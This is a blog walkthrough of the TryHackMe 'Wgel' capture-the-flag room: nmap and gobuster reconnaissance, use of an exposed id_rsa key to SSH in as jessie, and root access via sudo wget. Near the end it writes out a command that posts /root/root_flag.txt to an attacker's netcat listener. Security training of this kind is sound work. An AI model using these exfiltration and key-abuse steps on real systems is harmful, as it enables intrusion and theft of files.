Open in app

Sign in

Write

Sign in

Tryhackme- Wgel ctf

0xNehru
3 min readMay 21, 2021

--

tryhackme — wgel CTF

NMAP — network mapper

first we are going to do is a general nmap (network mapper) scan so that we get to know how many ports are opened.

# nmap -sT -vv -sC -sV <ip>

HTTP

summary of nmap:-

will see here 2 ports are open which are 80 and 22 . Port 22 is used to connect to SSH so with this help we got to know that we can connect through ssh and port 80 is for the HTTP that means it is hosting a website so lets run that IP in our browser.

gobuster

its look like an apache2 server then quick i got an idea of brute-forcing the website with some common extensions. so, to run a brute-force of extensions on website we use a tool called gobuster.

command:- gobuster dir -u <site URL> -w <word list> -x <extn>

root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

so here, we found something extension directory on /sitemap. so i had checked it on my extension then found this.

lets,check we have any directory in our host..

root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)

ya! we found for .ssh directory then i had opened the extension and found an id_rsa file.It was interesting..

here ,id_rsa key ..

then, remember something at starting of this we had an ssh connection possible. and check here the source code of the first wep page we found an user name called jessie.

user_flag.txt

to make sure u give a proper permissions to execute the file id_rsa as we know that.

#command — chmod 600 id_rsa

then,run this code to connect:

#ssh -i id_rsa jessie@<ipaddress>

root_flag.txt

first we know about privilege escalations the sudo -l to find what are available then i found it has no password so we cannot create a payload for root user then i had got an idea of exploiting vulnerability! then i had created.

# nc -lvnp 4444

on my machine i.e attackers machine

let’s check here — https://gtfobins.github.io/gtfobins/wget/

command : sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444

then we go for netcat,

# nc -lvnp 4444

we found on root flag here,

Tryhackme
Tryhackme Walkthrough
Ctf Writeup
Tryhackme Writeup

--

--

0xNehru
0xNehru

Written by 0xNehru

241 Followers
9 Following

Cybersecurity Specialist

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams